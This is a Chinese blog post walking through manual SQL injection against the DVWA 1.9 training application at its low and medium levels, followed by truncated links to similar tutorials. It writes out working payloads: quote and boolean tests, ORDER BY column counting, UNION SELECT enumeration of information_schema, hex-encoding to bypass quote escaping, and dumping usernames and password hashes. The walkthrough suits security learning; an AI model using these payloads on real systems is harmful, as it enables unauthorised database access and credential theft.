2. 程式人生 > >DVWA1.9 SQL注入全等級手工注入流程

DVWA1.9 SQL注入全等級手工注入流程

阿新 發佈:2018-12-21

最近想學習一下sql注入手工注入過,下面我將通過DVWA1.9的sql注入點進行手工注入。
手工注入的過程如下,MYSQL >5.0版的手工注入的原理主要是查詢information_schema索引庫來獲取目標資料庫的內容。

    1.判斷是否存在注入,注入是字元型還是數字型
    2.猜解SQL查詢語句中的欄位數
    3.確定顯示的欄位順序
    4.獲取當前資料庫
    5.獲取資料庫中的表
    6.獲取表中的欄位名
    7.下載資料

low

1. 判斷注入型別

1.首先在注入點出輸入1’,判斷id引數存在SQL注入漏洞。
在這裡插入圖片描述

2.輸入1 and 1=1 以及1 and 1=2 檢視結果無報錯,說明不是數字型的注入。


在這裡插入圖片描述在這裡插入圖片描述

3.輸入1’ and ‘1’ =‘2 以及1’ or ‘1’ =‘1 其中1’ or ‘1’ ='1將所有的值返回出來,由此可以判斷注入為字元型的注入。
在這裡插入圖片描述在這裡插入圖片描述

2.猜解欄位數

猜解欄位數方法可以使用order by語句進行欄位數的猜解,具體的使用方法如下:
1.在方框處輸入1′ or ‘1’='1 order by 2# 回顯成功。
在這裡插入圖片描述

2.在方框處輸入1′ or ‘1’='1 order by 3# 回顯錯誤如下圖所所示,表示目標只有兩個欄位。
在這裡插入圖片描述

3.猜解欄位順序

猜解欄位的順序使用的是聯合查詢:union select ,具體的猜解方法如下:
1.在方框處輸入1’ union select 1,2#,顯示結果如下圖所示,union select 後面的數字1,2在頁面上顯示出來了,說明sql語句查詢出來的結果在頁面上顯示的順序為First name為第一個欄位,Surname為第二個欄位。


在這裡插入圖片描述

4.獲取當前資料庫

1.在輸入框處的1’ union select 1,database()#,便可以在surname引數值處顯示資料庫的名字,如下圖,顯示的資料庫名為dvwa。
在這裡插入圖片描述

5.獲取資料庫中的表

1.在輸入框中輸入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
顯示出了兩個表,一個叫guestbook,一個叫users。
在這裡插入圖片描述

2.或者輸入1’ union select 1,table_name from information_schema.tables where table_schema=database() #,爆出的結果如下,顯示的內容為三行,由此可以確定group_concat()作用為把相同欄位的內容列印在一起。


在這裡插入圖片描述

6.獲取表中的欄位名

1.在輸入框中輸入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#,顯示出users表中有user_id,first_name,last_name,user,password,avatar,last_login,failed_login等8個欄位。
在這裡插入圖片描述

7.獲取欄位值

1.在輸入框中輸入1’ or 1=1 union select group_concat(user_id,first_name,last_name,user),group_concat(password) from users #,獲取的結果如下圖所示,最後一行的值為資料庫中的內容。
在這裡插入圖片描述

Medium

DVWA1.9 SQL 注入medium級別的環境請求方式改為了post型別,我們使用burp來進行測試。

1. 判斷注入型別

1.將id引數值改為1 or 1 = 1,輸入結果如下圖所示,爆出來了所有的使用者,由此可以判斷出注入型別為數字型注入。
在這裡插入圖片描述

2.猜解欄位數

1.將id引數值改為1 or 1 = 1 order by 2#,返回成功,如下圖。
在這裡插入圖片描述

2.將id引數值改為1 or 1 = 1 order by 3#,返回成功,如下圖,未返回任何值,說明有2個欄位。
在這裡插入圖片描述

3.猜解欄位順序

1.將id引數值修改為1 union select 1,2#,返回成功,判斷出頁面傳輸的順序:First name為第一個欄位,Surname為第二個欄位。
在這裡插入圖片描述

4.獲取當前資料庫

1.將id引數的值修改為1 union select 1,database()#,返回成功,輸出的結果可以判斷出目標資料庫的名為dvwa。
在這裡插入圖片描述

5.獲取資料庫中的表

1.將id引數的值改為1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,可以判斷出資料庫中存在兩個表,一個表為users,一個表為guestbook。
在這裡插入圖片描述

6.獲取表中的欄位名

1.將引數id的值改為1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#,返回結果為空,因為過濾了單引號(’),將’ 轉義為了’。
在這裡插入圖片描述

2.將“‘users’”進行16進位制轉義,id引數的值改為了:1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #,返回成功,獲取到了資料庫user表的欄位值。
在這裡插入圖片描述

7.獲取欄位值

1.在輸入框中輸入1’ or 1=1 union select group_concat(user_id,first_name,last_name,user),group_concat(password) from users #,獲取的結果如下圖所示,最後一行的值為資料庫中的內容。
在這裡插入圖片描述

HIGH

high級別的注入加了一個彈窗,除此之外與low級別的注入沒有什麼區別,這裡就不在過多的進行演示了。

總結

本人小白,請各位表哥批評指正。

相關推薦

DVWA1.9 SQL注入等級手工注入流程

最近想學習一下sql注入手工注入過,下面我將通過DVWA1.9的sql注入點進行手工注入。 手工注入的過程如下,MYSQL >5.0版的手工注入的原理主要是查詢information_schema索引庫來獲取目標資料庫的內容。 1.判斷是否存在注入,注入是字元型還是數字

墨者學院 - SQL過濾字元後手工注入漏洞測試(第1題)

一開始怎麼加字元都不行,才發現應該是檢測到我注入以後跳轉了; (過濾了空格和一些常規查詢字元,“+”號也過濾了,大小寫不能繞過那就URL編碼吧) 和以往的套路一樣,猜得到欄位是4個。。。 http://219.153.49.228:44375/new_list.php?id=-1/*

墨者學院 SQL過濾字元後手工注入漏洞測試(第3題)

 手工注入 墨者學院 SQL過濾字元後手工注入漏洞測試(第3題) 使用sqlmap 跑,跑不出表名,所以手工注入 點選進去靶場 域名url為:   http://219.153.49.228:41774/new_list.php?i

sql手工注入

猜是否存在注入: ' ' or 1=1# ') or 1=1# " 猜這句sql語句的欄位數目與內容的顯示: ') order by 10# 二分法縮小,知道沒有報錯 ') union select 1,2,3,4# 構造的內容: ') union select 1,x,3,x # questions in

SQL手工注入探索旅程(三)

SQL手工注入探索旅程(一) SQL手工注入探索旅程(一) 當無權讀取information_schema庫或者被拒絕union,order by這些語句 通過試驗去猜測資料庫資訊進而總結歸納出結果 設定dvwa安全等級為low | 我們在輸入框中輸入 一下

sql注入----手工注入總結

暴欄位長度 Order by num/* 匹配欄位 and 1=1 union select 1,2,3,4,5…….n/* 暴欄位位置 and 1=2 union select 1,2,3,4,5…..n/*   利用內建函式暴資料庫資訊 version(

SQL注入原理-手工注入access資料庫

一、Target: SQL注入原理、學習手工注入過程 二、實驗原理:通過把SQL命令插入到web表單提交或輸入域名或頁面請求的的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令 1、在結尾的連結中依次新增【’】和【and 1=1】和【and 1=2】判斷網

SQL手工注入基礎詳解----MSSQL篇

作者:DragonEgg資訊來源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/     一:注入點的判斷     當我們在URL後特殊字元或語句,使其報錯時,若在返回的資訊中有類似“[Microsoft][OD

簡單的sql注入之2 / writeup (手工注入,純屬練手)

多測試幾次可以發現,空格被註釋了,百度解決方法,用/**/代替空格的位置, 構造語句1'/**/or/**/'1'='1 確認為單引號注入 用order by 確認select欄位數,以確定union的欄位數 可得,只有一個欄位 獲取資料庫  1'/**

暑期練習web18:簡單的sql注入1,2(實驗吧)手工注入及sqlmap

目前只會做1和2。。3的話網上查了wp不知道他們sqlmap沒防任何過濾咱們跑出來的。。。等來年長了本事了,一定要自己手工做出來 注入1的話呢,在輸入1’ or ‘1’=’1的時候就發現存在過濾,後來發現是空格被過濾了,所以我們用註釋符/*來替換空格,注入1的

SQL注入實戰————1、MySQL手工注入實戰

SQL注入實戰 靶場地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到該URL中存在一個引數“MQ==”,從引數的格式來看是通過了base64進行了加密,那麼我們可以對其進行base64解密 發現解密之後的引

SQL手工注入的學習總結

sql手工注入有兩種,第一種是union聯合查詢,第二種是Ascii逐字解碼法 union聯合查詢語句如下: 首先判斷一個網站有沒有注入點的語句是  加單引號 ' 或 and 1=1 和and 1=2 and 1=1 網站返回正常,and 1=2 網站返回錯誤,證明有可能存

手工注入常用SQL語句

判斷資料庫型別:                                                                              Access: and (select id from MSysAccessObjects) >0

SQL手工注入大全

比方說在查詢id是50的資料時,如果使用者傳近來的引數是50 and 1=1,如果沒有設定過濾的話,可以直接查出來,SQL 注入一般在ASP程式中遇到最多,  看看下面的  1.判斷是否有注入  ;and 1=1  ;and 1=2  2.初步判斷是否是mssql  ;and user>0  3.判

SQL手工注入---表的猜解

手工注入過程 找到注入點→表名→列名→列長度→列值 猜解表名 http://www.xxx.com/index.asp?id=1 and exists(select * from 猜測的表名) exi

墨者學院-SQL手工注入漏洞測試(Access資料庫)

2.利用and 1=1 =1正常,and 1=2 出現報錯說明有注入點。 3.猜測存在的表,and exists (select * from admin),我這裡憑藉著經驗猜出來是admin表,如果不是的話可以繼續猜,格式為:and exists (se

SQL手工注入漏洞測試(Sql Server資料庫)

手工SQL注入過程,資料庫執行的語句,是頁面提交至伺服器應用程式,應用程式獲取id的值,然後把值拼接到查詢語句中,在到資料庫中查詢,通過程式解析後,把結果返回在頁面上,(使用時請將mozhe.cn替換成對應的靶場地址)。 開啟靶場環境: 第1步: 頁面提交:ht

SQL注入(四)手工注入攻擊步驟

0)首先測試正常資料。 連結的結尾新增【?id=1(數字任意)】 1) 判斷是否存在注入點; 【?id=32(數字任意)】連結的結尾依次新增語句【‘】、【and 1=1】和【and 1=2】,來判斷網站是否存在注入點。嘗試在正常資料後加上單引號,

SQL手工注入漏洞測試(MongoDB資料庫)

# 檢視是否有注入點 http://ip/new_list.php?id=1' # 想辦法閉合語句,檢視所有集合 # db.getCollectionNames()返回的是陣列,需要用tojson轉換為字串。並且mongodb函式區分大小寫 http://ip/new_li

asp+access sql手工注入步驟

理論介紹 資料庫結構 access資料庫  表      列          單元資料 例項 網站域名:http://127.0.0.1:81/0/0/ 檔案目錄:Production